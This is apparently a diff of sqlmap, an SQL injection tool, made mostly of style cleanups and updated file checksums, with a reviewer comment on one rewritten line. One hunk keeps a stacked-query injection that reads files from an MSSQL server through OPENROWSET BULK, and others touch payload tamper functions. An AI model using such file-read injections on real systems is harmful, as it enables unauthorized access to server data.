@ -763,8 +762,7 @@ class Databases:
elif Backend.getIdentifiedDbms() in (DBMS.ORACLE, DBMS.DB2): elif Backend.getIdentifiedDbms() in (DBMS.ORACLE, DBMS.DB2):
query = rootQuery.blind.query2 % (unsafeSQLIdentificatorNaming(tbl.upper()), column, unsafeSQLIdentificatorNaming(conf.db.upper())) query = rootQuery.blind.query2 % (unsafeSQLIdentificatorNaming(tbl.upper()), column, unsafeSQLIdentificatorNaming(conf.db.upper()))
elif Backend.isDbms(DBMS.MSSQL): elif Backend.isDbms(DBMS.MSSQL):
query = rootQuery.blind.query2 % (conf.db, conf.db, conf.db, conf.db, column, conf.db, query = rootQuery.blind.query2 % (conf.db, conf.db, conf.db, conf.db, column, conf.db, conf.db, conf.db, unsafeSQLIdentificatorNaming(tbl).split(".")[-1])
conf.db, conf.db, unsafeSQLIdentificatorNaming(tbl).split(".")[-1])
elif Backend.isDbms(DBMS.FIREBIRD): elif Backend.isDbms(DBMS.FIREBIRD):
query = rootQuery.blind.query2 % (unsafeSQLIdentificatorNaming(tbl), column) query = rootQuery.blind.query2 % (unsafeSQLIdentificatorNaming(tbl), column)
elif Backend.isDbms(DBMS.INFORMIX): elif Backend.isDbms(DBMS.INFORMIX):
@ -823,10 +821,7 @@ class Databases:
self.getTables() self.getTables()
infoMsg = "fetched tables: " infoMsg = "fetched tables: "
infoMsg += ", ".join(["%s" % ", ".join("%s%s%s" % (unsafeSQLIdentificatorNaming(db), ".." if \ infoMsg += ", ".join(["%s" % ", ".join("%s%s%s" % (unsafeSQLIdentificatorNaming(db), ".." if Backend.isDbms(DBMS.MSSQL) or Backend.isDbms(DBMS.SYBASE) else '.', unsafeSQLIdentificatorNaming(_)) for _ in tbl) for db, tbl in kb.data.cachedTables.items()])
Backend.isDbms(DBMS.MSSQL) or Backend.isDbms(DBMS.SYBASE) \
else ".", unsafeSQLIdentificatorNaming(t)) for t in tbl) for db, tbl in \
kb.data.cachedTables.items()])
logger.info(infoMsg) logger.info(infoMsg)
for db, tables in kb.data.cachedTables.items(): for db, tables in kb.data.cachedTables.items():
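Review bot: The rewritten "fetched tables" line packs two nested comprehensions and a conditional expression into a single line well over 200 characters and keeps a no-op `"%s" % ", ".join(...)` wrapper, which a PEP 8 pass should be shortening rather than lengthening. The separator is loop-invariant, so hoisting it reads better and saves the repeated DBMS lookups: `sep = ".." if Backend.isDbms(DBMS.MSSQL) or Backend.isDbms(DBMS.SYBASE) else "."` followed by `infoMsg += ", ".join(", ".join("%s%s%s" % (unsafeSQLIdentificatorNaming(db), sep, unsafeSQLIdentificatorNaming(_)) for _ in tbl) for db, tbl in kb.data.cachedTables.items())`. The enclosing method starts before the hunk.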


@ -470,7 +470,7 @@ class Entries:
if kb.data.cachedTables: if kb.data.cachedTables:
if isinstance(kb.data.cachedTables, list): if isinstance(kb.data.cachedTables, list):
kb.data.cachedTables = { None: kb.data.cachedTables } kb.data.cachedTables = {None: kb.data.cachedTables}
for db, tables in kb.data.cachedTables.items(): for db, tables in kb.data.cachedTables.items():
conf.db = db conf.db = db


@ -49,7 +49,7 @@ class Filesystem:
elif Backend.isDbms(DBMS.MSSQL): elif Backend.isDbms(DBMS.MSSQL):
self.createSupportTbl(self.fileTblName, self.tblField, "VARBINARY(MAX)") self.createSupportTbl(self.fileTblName, self.tblField, "VARBINARY(MAX)")
inject.goStacked("INSERT INTO %s(%s) SELECT %s FROM OPENROWSET(BULK '%s', SINGLE_BLOB) AS %s(%s)" % (self.fileTblName, self.tblField, self.tblField, remoteFile, self.fileTblName, self.tblField)); inject.goStacked("INSERT INTO %s(%s) SELECT %s FROM OPENROWSET(BULK '%s', SINGLE_BLOB) AS %s(%s)" % (self.fileTblName, self.tblField, self.tblField, remoteFile, self.fileTblName, self.tblField))
lengthQuery = "SELECT DATALENGTH(%s) FROM %s" % (self.tblField, self.fileTblName) lengthQuery = "SELECT DATALENGTH(%s) FROM %s" % (self.tblField, self.fileTblName)


@ -55,5 +55,4 @@ def tamper(payload, **kwargs):
_ = "%s %s BETWEEN %s AND %s" % (match.group(2), match.group(4), match.group(5), match.group(5)) _ = "%s %s BETWEEN %s AND %s" % (match.group(2), match.group(4), match.group(5), match.group(5))
retVal = retVal.replace(match.group(0), _) retVal = retVal.replace(match.group(0), _)
return retVal return retVal


@ -61,5 +61,3 @@ def tamper(payload, **kwargs):
break break
return payload return payload


@ -21,35 +21,35 @@ c88d66597f4aab719bde4542b0a1a6e0 extra/shutils/regressiontest.py
1e5532ede194ac9c083891c2f02bca93 extra/sqlharvest/__init__.py 1e5532ede194ac9c083891c2f02bca93 extra/sqlharvest/__init__.py
b3e60ea4e18a65c48515d04aab28ff68 extra/sqlharvest/sqlharvest.py b3e60ea4e18a65c48515d04aab28ff68 extra/sqlharvest/sqlharvest.py
0f581182871148b0456a691ae85b04c0 lib/controller/action.py 0f581182871148b0456a691ae85b04c0 lib/controller/action.py
e8533a8a406fe58cc610337639ed4bb1 lib/controller/checks.py 62a348c0ed32c7e67cd456680791cad5 lib/controller/checks.py
9fbd66da9b5cf58bbb8474ccf9252bb7 lib/controller/controller.py a66044daa98684fde830324c54da98ee lib/controller/controller.py
a7b0c8e5a18a3abe8803999dcfc4664f lib/controller/handler.py c7443613a0a2505b1faec931cee2a6ef lib/controller/handler.py
1e5532ede194ac9c083891c2f02bca93 lib/controller/__init__.py 1e5532ede194ac9c083891c2f02bca93 lib/controller/__init__.py
052c368ae6ca09362a19376c8483fa85 lib/core/agent.py b1990c7805943f0c973a853bba981d96 lib/core/agent.py
591c66fa439a48b7d8b5b581437cd14d lib/core/bigarray.py fd8f239e259afaf5f24bcf34a0ad187f lib/core/bigarray.py
33c03aad7f4c6e7241b6f204560e69ca lib/core/common.py 33c03aad7f4c6e7241b6f204560e69ca lib/core/common.py
2910524e4478be6b5893fb9d851a62ec lib/core/convert.py 1c4c4bf8eacc911378a2e4b2f9f03184 lib/core/convert.py
9f87391b6a3395f7f50830b391264f27 lib/core/data.py 9f87391b6a3395f7f50830b391264f27 lib/core/data.py
72016ea5c994a711a262fd64572a0fcd lib/core/datatype.py 72016ea5c994a711a262fd64572a0fcd lib/core/datatype.py
12e80071013606f01822c3823fb51054 lib/core/decorators.py 12e80071013606f01822c3823fb51054 lib/core/decorators.py
9458679feb9184f3fb1611daf1ebef63 lib/core/defaults.py fbb55cc6100318ff922957b6577dc58f lib/core/defaults.py
a8bea09096a42a9a7feeb9d4d118ae66 lib/core/dicts.py da98f5288aad57855c6d287ba3b397a1 lib/core/dicts.py
9ea8a043030796e6faef7f7e957729d5 lib/core/dump.py 9ea8a043030796e6faef7f7e957729d5 lib/core/dump.py
c8551f7696a76450e6d139409e4f06cd lib/core/enums.py bfffdc74a93ff647c49b79c215d96d8a lib/core/enums.py
cada93357a7321655927fc9625b3bfec lib/core/exception.py cada93357a7321655927fc9625b3bfec lib/core/exception.py
1e5532ede194ac9c083891c2f02bca93 lib/core/__init__.py 1e5532ede194ac9c083891c2f02bca93 lib/core/__init__.py
458a194764805cd8312c14ecd4be4d1e lib/core/log.py 458a194764805cd8312c14ecd4be4d1e lib/core/log.py
63ac6631d75e4f7c20b946a0c06bad33 lib/core/optiondict.py c9a56e58984420a5abb7a3f7aadc196d lib/core/optiondict.py
8a9346b975931d8d995354692ab68f82 lib/core/option.py 911ec851f2cad046036ddaf776c8559f lib/core/option.py
7dadbb9a301d40cc8cd9c7491e99b43d lib/core/profiling.py 7cfd04e583cca782b843f6f6d973981a lib/core/profiling.py
ffa5f01f39b17c8d73423acca6cfe86a lib/core/readlineng.py ffa5f01f39b17c8d73423acca6cfe86a lib/core/readlineng.py
0c3eef46bdbf87e29a3f95f90240d192 lib/core/replication.py 0c3eef46bdbf87e29a3f95f90240d192 lib/core/replication.py
a7db43859b61569b601b97f187dd31c5 lib/core/revision.py a7db43859b61569b601b97f187dd31c5 lib/core/revision.py
fcb74fcc9577523524659ec49e2e964b lib/core/session.py fcb74fcc9577523524659ec49e2e964b lib/core/session.py
053e81e44a3df054a3ffd39d58de7079 lib/core/settings.py 36989c9805e448024fc49aabde49a69e lib/core/settings.py
d0adc28a38e43a787df4471f7f027413 lib/core/shell.py 0dfc2ed40adf72e302291f6ecd4406f6 lib/core/shell.py
63491be462c515a1a3880c27c2acc4a2 lib/core/subprocessng.py a7edc9250d13af36ac0108f259859c19 lib/core/subprocessng.py
3cc852f927833895361973fbcfd156d2 lib/core/target.py 12f8c42ed742581644f6476a7d80dcf8 lib/core/target.py
72d499ca8d792e90a1ebfb2ad2341a51 lib/core/testing.py 72d499ca8d792e90a1ebfb2ad2341a51 lib/core/testing.py
de9922a29c71a235cb95a916ff925db2 lib/core/threads.py de9922a29c71a235cb95a916ff925db2 lib/core/threads.py
c40758411bb0bd68764d78e0bb72bd0f lib/core/unescaper.py c40758411bb0bd68764d78e0bb72bd0f lib/core/unescaper.py
@ -57,122 +57,122 @@ c40758411bb0bd68764d78e0bb72bd0f lib/core/unescaper.py
e772deb63270375e685fa5a7b775c382 lib/core/wordlist.py e772deb63270375e685fa5a7b775c382 lib/core/wordlist.py
1e5532ede194ac9c083891c2f02bca93 lib/__init__.py 1e5532ede194ac9c083891c2f02bca93 lib/__init__.py
7620f1f4b8791e13c7184c06b5421754 lib/parse/banner.py 7620f1f4b8791e13c7184c06b5421754 lib/parse/banner.py
d505c725f5d6887ec80b5b94ca1dc9f5 lib/parse/cmdline.py f667710f17b8447358ee7508a9d2faf1 lib/parse/cmdline.py
fb2e2f05dde98caeac6ccf3e67192177 lib/parse/configfile.py fb2e2f05dde98caeac6ccf3e67192177 lib/parse/configfile.py
3794ff139869f5ae8e81cfdbe5714f56 lib/parse/handler.py 3794ff139869f5ae8e81cfdbe5714f56 lib/parse/handler.py
263ee1cec41facd2a06d0dc887b207ad lib/parse/headers.py 8d7321a1bc1a26ac55b2398bf445d78f lib/parse/headers.py
33f21b11b7963062df8fa2292229df80 lib/parse/html.py 33f21b11b7963062df8fa2292229df80 lib/parse/html.py
1e5532ede194ac9c083891c2f02bca93 lib/parse/__init__.py 1e5532ede194ac9c083891c2f02bca93 lib/parse/__init__.py
ec4e56bbb1349176b2a22e0b99ba6a55 lib/parse/payloads.py ec4e56bbb1349176b2a22e0b99ba6a55 lib/parse/payloads.py
492654567e72b6a14584651fcd9f16e6 lib/parse/sitemap.py 492654567e72b6a14584651fcd9f16e6 lib/parse/sitemap.py
30eed3a92a04ed2c29770e1b10d39dc0 lib/request/basicauthhandler.py 30eed3a92a04ed2c29770e1b10d39dc0 lib/request/basicauthhandler.py
eb39d5cbd69a2238e2f4ea2fde183cdb lib/request/basic.py 53c38db67dd4b14fbceee71e4748f874 lib/request/basic.py
c0cabedead14b8a23353b606672cff42 lib/request/comparison.py c0cabedead14b8a23353b606672cff42 lib/request/comparison.py
94c0ce8d2a2d9001a416420f61b67ee7 lib/request/connect.py b91eaa32c602182c4f6e2f7d6de61267 lib/request/connect.py
dd4598675027fae99f2e2475b05986da lib/request/direct.py dd4598675027fae99f2e2475b05986da lib/request/direct.py
2044fce3f4ffa268fcfaaf63241b1e64 lib/request/dns.py 2044fce3f4ffa268fcfaaf63241b1e64 lib/request/dns.py
a1436e4e4f9b636cb8332f00b686bfd5 lib/request/httpshandler.py eee965d781546d05f36cfd14af050913 lib/request/httpshandler.py
1e5532ede194ac9c083891c2f02bca93 lib/request/__init__.py 1e5532ede194ac9c083891c2f02bca93 lib/request/__init__.py
bee0a8bec4968406e93281d2b8ad62c8 lib/request/inject.py cb05d965aa3d5871d14b5e45fe9128b4 lib/request/inject.py
aaf956c1e9855836c3f372e29d481393 lib/request/methodrequest.py aaf956c1e9855836c3f372e29d481393 lib/request/methodrequest.py
51eeaa8abf5ba62aaaade66d46ff8b00 lib/request/pkihandler.py 51eeaa8abf5ba62aaaade66d46ff8b00 lib/request/pkihandler.py
aa7cb67139bbc57d67a728fd2abf80ed lib/request/rangehandler.py aa7cb67139bbc57d67a728fd2abf80ed lib/request/rangehandler.py
aa809d825b33bea76a63ecd97cf7792c lib/request/redirecthandler.py aa809d825b33bea76a63ecd97cf7792c lib/request/redirecthandler.py
bbfe91128ab3ad65343ed449936a890b lib/request/templates.py 7f12d8f3b6665ed7053954bba70ff718 lib/request/templates.py
edfd88ee82c2b2a0a762dad1f4eb5253 lib/takeover/abstraction.py 8d31425f36a7a9c093eb9bef44589593 lib/takeover/abstraction.py
acc1db3667bf910b809eb279b60595eb lib/takeover/icmpsh.py acc1db3667bf910b809eb279b60595eb lib/takeover/icmpsh.py
1e5532ede194ac9c083891c2f02bca93 lib/takeover/__init__.py 1e5532ede194ac9c083891c2f02bca93 lib/takeover/__init__.py
703e15714316a8cc4bbe54cdd0a8cb87 lib/takeover/metasploit.py b1a6689e92e6ce998337bd41d8b09d6e lib/takeover/metasploit.py
0fc9b00596df21c8878ef92f513ecad7 lib/takeover/registry.py fb9e34d558293b5d6b9727f440712886 lib/takeover/registry.py
48575dde7bb867b7937769f569a98309 lib/takeover/udf.py 48575dde7bb867b7937769f569a98309 lib/takeover/udf.py
746f400dfa6dc1139f14c44574d6b948 lib/takeover/web.py 4584ac6ee5c13d4d395f0a7a21d8478c lib/takeover/web.py
d8c10f278e5943b137a222f4cedca59d lib/takeover/xp_cmdshell.py 79d1ba3ab7b2552c5f09992ce08e765d lib/takeover/xp_cmdshell.py
b84d45fc7349caa714f9769b13d70cab lib/techniques/blind/inference.py 2543e14cc7f6e239b49dd40f41bc34fa lib/techniques/blind/inference.py
1e5532ede194ac9c083891c2f02bca93 lib/techniques/blind/__init__.py 1e5532ede194ac9c083891c2f02bca93 lib/techniques/blind/__init__.py
1e5532ede194ac9c083891c2f02bca93 lib/techniques/dns/__init__.py 1e5532ede194ac9c083891c2f02bca93 lib/techniques/dns/__init__.py
855355a1a216f6b267a5f089028f1cd8 lib/techniques/dns/test.py 855355a1a216f6b267a5f089028f1cd8 lib/techniques/dns/test.py
733f3419ff2ea23f75bc24e36f4746d9 lib/techniques/dns/use.py 733f3419ff2ea23f75bc24e36f4746d9 lib/techniques/dns/use.py
1e5532ede194ac9c083891c2f02bca93 lib/techniques/error/__init__.py 1e5532ede194ac9c083891c2f02bca93 lib/techniques/error/__init__.py
627ddc86a5a969e5509c7531c5c27a6c lib/techniques/error/use.py f999f2e88dea9ac8831eb2f468478b5f lib/techniques/error/use.py
1e5532ede194ac9c083891c2f02bca93 lib/techniques/__init__.py 1e5532ede194ac9c083891c2f02bca93 lib/techniques/__init__.py
1e5532ede194ac9c083891c2f02bca93 lib/techniques/union/__init__.py 1e5532ede194ac9c083891c2f02bca93 lib/techniques/union/__init__.py
da5a117fb64723e6c815b0e33d50f66a lib/techniques/union/test.py da5a117fb64723e6c815b0e33d50f66a lib/techniques/union/test.py
ac67ebbabd06bf9853befc65ad49679e lib/techniques/union/use.py 11ecf2effbe9f40b361843d546c3c521 lib/techniques/union/use.py
609ba6e5039de4814115b966cd72645a lib/utils/api.py c552f8d924d962a26f2ded250bcea3b8 lib/utils/api.py
37dfb641358669f62c2acedff241348b lib/utils/brute.py 37dfb641358669f62c2acedff241348b lib/utils/brute.py
a34c4fd2e7d78c5dfdd9eeccb079fb1c lib/utils/crawler.py 31b1e7eb489eac837db6a2bc1dcb7da7 lib/utils/crawler.py
69c25da85a3a71a9798804075cdfd62b lib/utils/deps.py de9620f03231d8329ee8434884b6bacd lib/utils/deps.py
a6d6888e14a7c11f0884c8cc18489caa lib/utils/getch.py 635ed692ab141d428d0957b71b25c1aa lib/utils/getch.py
7af29f61302c8693cd6436d4b69e22d3 lib/utils/har.py 7af29f61302c8693cd6436d4b69e22d3 lib/utils/har.py
062e4e8fc43ac54305a75ddd0d482f81 lib/utils/hashdb.py 062e4e8fc43ac54305a75ddd0d482f81 lib/utils/hashdb.py
55c552e754b54cd25a47efb84d3e6892 lib/utils/hash.py cc1cfe36057f1d9bbdcba1bcc03359f9 lib/utils/hash.py
145120b21fcfca843d5e2c8b0562e4db lib/utils/htmlentities.py 011d2dbf589e0faa0deca61a651239cc lib/utils/htmlentities.py
1e5532ede194ac9c083891c2f02bca93 lib/utils/__init__.py 1e5532ede194ac9c083891c2f02bca93 lib/utils/__init__.py
010d8327239d33af4ce9f25683cfc012 lib/utils/pivotdumptable.py 010d8327239d33af4ce9f25683cfc012 lib/utils/pivotdumptable.py
5d6d73d27833eef1b10b9215629533ff lib/utils/progress.py 5cb78b0e60fd7fd84502d62cf85d2064 lib/utils/progress.py
0ec5cec9d93d5ffd1eaeda6e942ecadf lib/utils/purge.py 0ec5cec9d93d5ffd1eaeda6e942ecadf lib/utils/purge.py
4a6886d3a0c7bf768df97738fa257de9 lib/utils/search.py 4a6886d3a0c7bf768df97738fa257de9 lib/utils/search.py
236a8d9e596602b53f8e0aa09c30c0ef lib/utils/sqlalchemy.py 236a8d9e596602b53f8e0aa09c30c0ef lib/utils/sqlalchemy.py
dcc25183c6bd85b172c87cfcbc305ab6 lib/utils/timeout.py dcc25183c6bd85b172c87cfcbc305ab6 lib/utils/timeout.py
ce5ec6300bc0a185827a21d8a8f09de3 lib/utils/versioncheck.py 3d230e342a6c8d60ac7c68c556fbba9b lib/utils/versioncheck.py
1e9cf437451ff8147a372a002641b963 lib/utils/xrange.py 7348ee704485651737ddbe3538271be9 lib/utils/xrange.py
b9d2761f47fec3d98b88311a263fd5db plugins/dbms/access/connector.py b9d2761f47fec3d98b88311a263fd5db plugins/dbms/access/connector.py
3f1c50a1507d1c2f69c20c706230e2e2 plugins/dbms/access/enumeration.py 3f1c50a1507d1c2f69c20c706230e2e2 plugins/dbms/access/enumeration.py
fcc66fc377db3681f7890ec55675564b plugins/dbms/access/filesystem.py fcc66fc377db3681f7890ec55675564b plugins/dbms/access/filesystem.py
47a9c7a39ad179b73a9d6f0e1f269f74 plugins/dbms/access/fingerprint.py c2428c5c73d049abf4442ec1b9404a25 plugins/dbms/access/fingerprint.py
e657b1b7a295a38ac9ce515158164f00 plugins/dbms/access/__init__.py e657b1b7a295a38ac9ce515158164f00 plugins/dbms/access/__init__.py
77686d7c7e287d5db0a9a87f2c7d4902 plugins/dbms/access/syntax.py 77686d7c7e287d5db0a9a87f2c7d4902 plugins/dbms/access/syntax.py
2f1d8706b51497623b2b59c07b552bdc plugins/dbms/access/takeover.py 2f1d8706b51497623b2b59c07b552bdc plugins/dbms/access/takeover.py
0cf941076f4685ec8ac63f57b31a46a6 plugins/dbms/db2/connector.py ead470b613e52e718a3062b63b518272 plugins/dbms/db2/connector.py
0884e475c98701f8e698150aa122fb76 plugins/dbms/db2/enumeration.py 0884e475c98701f8e698150aa122fb76 plugins/dbms/db2/enumeration.py
da9dccd1f9ec2cf1e53295125dd983a0 plugins/dbms/db2/filesystem.py da9dccd1f9ec2cf1e53295125dd983a0 plugins/dbms/db2/filesystem.py
a660e74854f3c70606f1cc3bc450fbcc plugins/dbms/db2/fingerprint.py ba492b2aaa6432b5548c5a8fa5eec435 plugins/dbms/db2/fingerprint.py
95b35cbd859bbced44e7f8fd84486d75 plugins/dbms/db2/__init__.py 95b35cbd859bbced44e7f8fd84486d75 plugins/dbms/db2/__init__.py
82d96d8fcfd565129580260040555623 plugins/dbms/db2/syntax.py 82d96d8fcfd565129580260040555623 plugins/dbms/db2/syntax.py
25f0fb28e9defcab48a2e946fbb7550a plugins/dbms/db2/takeover.py 25f0fb28e9defcab48a2e946fbb7550a plugins/dbms/db2/takeover.py
4a941e7f39dc098ee489eeacc720a8cc plugins/dbms/firebird/connector.py 53bd7de27d37958f543f5329362ac298 plugins/dbms/firebird/connector.py
bc4d71116d7296d63894484f2e60ade2 plugins/dbms/firebird/enumeration.py bc4d71116d7296d63894484f2e60ade2 plugins/dbms/firebird/enumeration.py
c3ca81000200e5ab4210e9bf2e04ce93 plugins/dbms/firebird/filesystem.py c3ca81000200e5ab4210e9bf2e04ce93 plugins/dbms/firebird/filesystem.py
94a86678fd2bf6bff6c3439934f59277 plugins/dbms/firebird/fingerprint.py bd2159afbe83c70059f57712b4ae0189 plugins/dbms/firebird/fingerprint.py
d4ea3036492b8ae15340548b2936021f plugins/dbms/firebird/__init__.py d4ea3036492b8ae15340548b2936021f plugins/dbms/firebird/__init__.py
c56f2dabe88fd761a1a9a51e4d104088 plugins/dbms/firebird/syntax.py c56f2dabe88fd761a1a9a51e4d104088 plugins/dbms/firebird/syntax.py
1522a29bd4b54ea78bb2855fc32b6c72 plugins/dbms/firebird/takeover.py 1522a29bd4b54ea78bb2855fc32b6c72 plugins/dbms/firebird/takeover.py
61225f674e64bc6eafea140c4cf93deb plugins/dbms/hsqldb/connector.py 271a7f16e781d56a0a31a3d5515a1945 plugins/dbms/hsqldb/connector.py
95919592e5bb83df00b99bb9e8a70977 plugins/dbms/hsqldb/enumeration.py 95919592e5bb83df00b99bb9e8a70977 plugins/dbms/hsqldb/enumeration.py
616595e74ecb644271cbbd31815d92e0 plugins/dbms/hsqldb/filesystem.py 616595e74ecb644271cbbd31815d92e0 plugins/dbms/hsqldb/filesystem.py
b7d693a6f5f39fee0a65f2d7b0830c5e plugins/dbms/hsqldb/fingerprint.py b7d693a6f5f39fee0a65f2d7b0830c5e plugins/dbms/hsqldb/fingerprint.py
fd369161778d6b48d7f1f7fc14dcdb5c plugins/dbms/hsqldb/__init__.py fd369161778d6b48d7f1f7fc14dcdb5c plugins/dbms/hsqldb/__init__.py
4673ebfdce9859718c19e8a7765da8d3 plugins/dbms/hsqldb/syntax.py 4673ebfdce9859718c19e8a7765da8d3 plugins/dbms/hsqldb/syntax.py
7c0535736215ca612756cf589adb249b plugins/dbms/hsqldb/takeover.py 7c0535736215ca612756cf589adb249b plugins/dbms/hsqldb/takeover.py
5fca2136204e0ea432cc7a2572244a20 plugins/dbms/informix/connector.py 9ceb9430031a26ecebe13ea49cb2a5fa plugins/dbms/informix/connector.py
c54d70e4847c6327bd3110c4d8723b04 plugins/dbms/informix/enumeration.py c54d70e4847c6327bd3110c4d8723b04 plugins/dbms/informix/enumeration.py
da9dccd1f9ec2cf1e53295125dd983a0 plugins/dbms/informix/filesystem.py da9dccd1f9ec2cf1e53295125dd983a0 plugins/dbms/informix/filesystem.py
35eac2f3837a72940eb50753dc4566e5 plugins/dbms/informix/fingerprint.py 35eac2f3837a72940eb50753dc4566e5 plugins/dbms/informix/fingerprint.py
9dac94c8f76acf0be65b6c57ecdb5c34 plugins/dbms/informix/__init__.py 9dac94c8f76acf0be65b6c57ecdb5c34 plugins/dbms/informix/__init__.py
39dc5c088b4d37742290acc76c47fe94 plugins/dbms/informix/syntax.py aa77fec4fe6b2d7ca4a91aebd9ff4e21 plugins/dbms/informix/syntax.py
25f0fb28e9defcab48a2e946fbb7550a plugins/dbms/informix/takeover.py 25f0fb28e9defcab48a2e946fbb7550a plugins/dbms/informix/takeover.py
1e5532ede194ac9c083891c2f02bca93 plugins/dbms/__init__.py 1e5532ede194ac9c083891c2f02bca93 plugins/dbms/__init__.py
6917f9b045f6188b89e816dea9b46a3f plugins/dbms/maxdb/connector.py 6917f9b045f6188b89e816dea9b46a3f plugins/dbms/maxdb/connector.py
615be11d750530211af244b6ca6aef14 plugins/dbms/maxdb/enumeration.py f33efaab1695dc9885ebae3f6072fffa plugins/dbms/maxdb/enumeration.py
ffd26f64142226d0b1ed1d70f7f294c0 plugins/dbms/maxdb/filesystem.py ffd26f64142226d0b1ed1d70f7f294c0 plugins/dbms/maxdb/filesystem.py
9f9f1c4c4c3150545c4b61d1cffc76a8 plugins/dbms/maxdb/fingerprint.py 9f9f1c4c4c3150545c4b61d1cffc76a8 plugins/dbms/maxdb/fingerprint.py
4321d7018f5121343460ebfd83bb69be plugins/dbms/maxdb/__init__.py 4321d7018f5121343460ebfd83bb69be plugins/dbms/maxdb/__init__.py
e7d44671ae26c0bcd5fe8448be070bbd plugins/dbms/maxdb/syntax.py e7d44671ae26c0bcd5fe8448be070bbd plugins/dbms/maxdb/syntax.py
bf7842bb291e2297c3c8d1023eb3e550 plugins/dbms/maxdb/takeover.py bf7842bb291e2297c3c8d1023eb3e550 plugins/dbms/maxdb/takeover.py
6439d15c1e8cdb069056c4fa725326df plugins/dbms/mssqlserver/connector.py 6439d15c1e8cdb069056c4fa725326df plugins/dbms/mssqlserver/connector.py
a833fbc30ab1133bc6ba293d97d0ef7c plugins/dbms/mssqlserver/enumeration.py f1f1541a54faf67440179fa521f99849 plugins/dbms/mssqlserver/enumeration.py
7e495d786fa8e1da96e73e2905bbd7dd plugins/dbms/mssqlserver/filesystem.py 177e1d55d28ed3190bc0079b8126c6be plugins/dbms/mssqlserver/filesystem.py
03d463c15ebbfa4e49155b261b59db31 plugins/dbms/mssqlserver/fingerprint.py 51eb413ac62408965be20a812f2412c8 plugins/dbms/mssqlserver/fingerprint.py
affef90b1442285da7e89e46603c502e plugins/dbms/mssqlserver/__init__.py affef90b1442285da7e89e46603c502e plugins/dbms/mssqlserver/__init__.py
612be1929108e7b4512a49a4a3837bbc plugins/dbms/mssqlserver/syntax.py 612be1929108e7b4512a49a4a3837bbc plugins/dbms/mssqlserver/syntax.py
b9e62a80bd3ead133a511f9769e5e6c3 plugins/dbms/mssqlserver/takeover.py 08fe8ac7acdfc0e3168b5b069a7c73bf plugins/dbms/mssqlserver/takeover.py
f6e1f3f09f32b9cb2ca11c016d373423 plugins/dbms/mysql/connector.py f6e1f3f09f32b9cb2ca11c016d373423 plugins/dbms/mysql/connector.py
445164daf59b890aeacc968af58fcb53 plugins/dbms/mysql/enumeration.py 445164daf59b890aeacc968af58fcb53 plugins/dbms/mysql/enumeration.py
f36e09edc3eafedd989fbe44ec048e71 plugins/dbms/mysql/filesystem.py f36e09edc3eafedd989fbe44ec048e71 plugins/dbms/mysql/filesystem.py
2bfd2369aebe2999f7333cca0895507c plugins/dbms/mysql/fingerprint.py fcbf7ff279c527b4aca0dac94c28d20c plugins/dbms/mysql/fingerprint.py
88b876f085fec2569a0697f4b69f41da plugins/dbms/mysql/__init__.py 30065993f8300994e4658634121609e9 plugins/dbms/mysql/__init__.py
0e2adbee217f5b94dcc124d24b8dde99 plugins/dbms/mysql/syntax.py 0e2adbee217f5b94dcc124d24b8dde99 plugins/dbms/mysql/syntax.py
f30009816db6a0b41342301f0d657a01 plugins/dbms/mysql/takeover.py 403591e638b6bfdb840d52bd3138ee56 plugins/dbms/mysql/takeover.py
999cb8d0d52820d30bdd4b3d658a765d plugins/dbms/oracle/connector.py 999cb8d0d52820d30bdd4b3d658a765d plugins/dbms/oracle/connector.py
e1ffee36fd18f33f34bb4bac4ae43f14 plugins/dbms/oracle/enumeration.py e1ffee36fd18f33f34bb4bac4ae43f14 plugins/dbms/oracle/enumeration.py
c326b0d8bed92be67888b0242f565ac8 plugins/dbms/oracle/filesystem.py c326b0d8bed92be67888b0242f565ac8 plugins/dbms/oracle/filesystem.py
@ -184,8 +184,8 @@ f99c23db4ee6a6b8c0edbf684d360ad3 plugins/dbms/postgresql/connector.py
7cdb821884e5f15084d1bea7f8a50574 plugins/dbms/postgresql/enumeration.py 7cdb821884e5f15084d1bea7f8a50574 plugins/dbms/postgresql/enumeration.py
c8bb829d45752b98e6a03817b92e0fe5 plugins/dbms/postgresql/filesystem.py c8bb829d45752b98e6a03817b92e0fe5 plugins/dbms/postgresql/filesystem.py
603d533d924498378eccba4f0f196be6 plugins/dbms/postgresql/fingerprint.py 603d533d924498378eccba4f0f196be6 plugins/dbms/postgresql/fingerprint.py
4fe6dcf2b43b6dac46f31d75e9de260d plugins/dbms/postgresql/__init__.py 470860d3e85d11a67f2220bffaa415e7 plugins/dbms/postgresql/__init__.py
c8c2d660977e3e07182e7cdf31aa786a plugins/dbms/postgresql/syntax.py 20e6f48f496348be45f3402ebc265dbb plugins/dbms/postgresql/syntax.py
1287acf330da86a93c8e64aff46e3b65 plugins/dbms/postgresql/takeover.py 1287acf330da86a93c8e64aff46e3b65 plugins/dbms/postgresql/takeover.py
3009438ba259ca159c5ce9799f27dec1 plugins/dbms/sqlite/connector.py 3009438ba259ca159c5ce9799f27dec1 plugins/dbms/sqlite/connector.py
5194556e6b1575b1349f8ccfd773952b plugins/dbms/sqlite/enumeration.py 5194556e6b1575b1349f8ccfd773952b plugins/dbms/sqlite/enumeration.py
@ -195,7 +195,7 @@ f639120d42b33b6ca67930bddbf2ac1f plugins/dbms/sqlite/__init__.py
964e59d2eba619b068b0a15cea28efe0 plugins/dbms/sqlite/syntax.py 964e59d2eba619b068b0a15cea28efe0 plugins/dbms/sqlite/syntax.py
3364b2938d7040c507cd622c323557dc plugins/dbms/sqlite/takeover.py 3364b2938d7040c507cd622c323557dc plugins/dbms/sqlite/takeover.py
6439d15c1e8cdb069056c4fa725326df plugins/dbms/sybase/connector.py 6439d15c1e8cdb069056c4fa725326df plugins/dbms/sybase/connector.py
31462dc5a1cd2a1b4eba6762d18fb48c plugins/dbms/sybase/enumeration.py 426698152f63504061e5875e64957691 plugins/dbms/sybase/enumeration.py
74de450dd6d6d006aa9c7eed56e6b09a plugins/dbms/sybase/filesystem.py 74de450dd6d6d006aa9c7eed56e6b09a plugins/dbms/sybase/filesystem.py
c8ee0deaa2309e96d9a409ff1524f3ad plugins/dbms/sybase/fingerprint.py c8ee0deaa2309e96d9a409ff1524f3ad plugins/dbms/sybase/fingerprint.py
a3db8618eed5bb2807b6f77605cba9cc plugins/dbms/sybase/__init__.py a3db8618eed5bb2807b6f77605cba9cc plugins/dbms/sybase/__init__.py
@ -203,10 +203,10 @@ a3db8618eed5bb2807b6f77605cba9cc plugins/dbms/sybase/__init__.py
79f6c7017db4ded8f74a0117188836ff plugins/dbms/sybase/takeover.py 79f6c7017db4ded8f74a0117188836ff plugins/dbms/sybase/takeover.py
